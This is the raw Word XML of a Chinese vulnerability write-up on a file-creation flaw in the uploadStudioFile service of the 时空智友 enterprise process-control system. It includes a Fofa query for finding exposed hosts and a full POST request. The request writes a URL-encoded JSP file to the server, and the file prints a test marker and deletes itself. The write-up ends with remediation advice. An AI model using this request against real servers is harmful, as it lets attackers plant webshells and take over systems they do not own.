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时空智友企业流程化管控系统 uploadStudioFile 文件创建漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时空智友企业流程化管控系统致力于协助大健康企业构建内部信息化，解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化、商务协同管理、集团管理。该系统存在文件创建漏洞，可通过该漏洞创建Webshell获取服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fofa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>body="login.jsp?login=null"</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5614670" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="889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4670" cy="236918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部分界面如下</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195570" cy="2548890"/>
            <wp:effectExtent l="0" t="0" r="127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195570" cy="254889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eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>隐患url，验证如下</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POST /formservice?service=updater.uploadStudioFile HTTP/1.1</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 xml:space="preserve">Host: </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Content-Type: application/x-www-form-urlencoded</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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15</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Content-Length: 481</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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>content=&lt;?xml%20version="1.0"?&gt;&lt;root&gt;&lt;filename&gt;1.jsp&lt;/filename&gt;&lt;filepath&gt;./&lt;/filepath&gt;&lt;filesize&gt;172&lt;/filesize&gt;&lt;lmtime&gt;1970-01-01%2008:00:00&lt;/lmtime&gt;&lt;/root&gt;&lt;!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%74%65%73%74%31%32%33%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%20%25%3e --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="220154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4150" cy="220154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4、update/temp/studio/1.jsp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="210121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040" cy="2101215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、产商已发布安全版本，请联系产商修复。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14FB6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0BE14FB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0AE142A2"/>
    <w:rsid w:val="113E0580"/>
    <w:rsid w:val="1F381145"/>
    <w:rsid w:val="7CF40BDF"/>
    <w:rsid w:val="7E69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2023-12-17T14:39:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-18T14:22:15Z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66C594E2D8854B0E859CA204B3DB8D95_12</vt:lpwstr>
  </property>
</Properties>
</file>